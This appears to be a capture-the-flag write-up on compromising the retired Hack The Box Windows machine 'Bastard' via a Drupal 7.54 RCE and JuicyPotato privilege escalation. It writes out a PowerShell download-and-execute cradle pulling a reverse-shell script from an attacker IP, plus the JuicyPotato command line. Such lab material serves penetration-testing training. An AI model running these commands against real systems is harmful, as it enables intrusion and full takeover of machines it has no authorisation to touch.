OSCP PREPROTİONS – HTB Bastard

Bastard machine is a vulnerable machine with windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Clasic Scan

Full port Scan

As a result of port scanning, “80/tcp http IIS httpd 7.5, 135/tcp msrp Windows RPC, 49154/tcp msrpc Windows RPC” ports are open.
We provide enumeration over port 80.

We encountered a drupal cms that offers admin passord, we tried default passwords but we were not successful. We checked the saturas given by Nmap and saw the version number in the /CHANGELOG.txt directory

We saw it was 7.54, so let’s see if there’s a vulnerability with that.
Searchsploit found

There is an RCE vulnerability, we prefer not to be authenticated because we still haven’t found any credential information at the moment.
I’m trying to exploit this vulnerability on my own machine.

We edited this line according to what we wanted.
But when we tried to run this exploit we got an error

Let’s search for exploits on Github

We dowloand this and used it

Let’s run it on the target we have seen its usage

Here we were able to run the whoami command.
Now let’s try to install and run nc to give us an interactive Shell
We’ve installed nc on the target

Then we ran nc.exe and it gave us Shell

Here we have obtained the user flag but we cannot access the administrator folder

Here we enumerate local to get the root flag.

We understand that there is a JuicyPotato appetizer here.
We pass JuicyPotato.exe and Shell.bat to the target machine
Shell.bat includes (powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1’)”)
We write

Then we pass it on.

Then run JuicyPotato.exe
.\JuicyPotato.exe -t * -p shell.bat -l 5555 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

We write, we run, Shell comes on port 4723, which we listen with nc

Now we get the root flag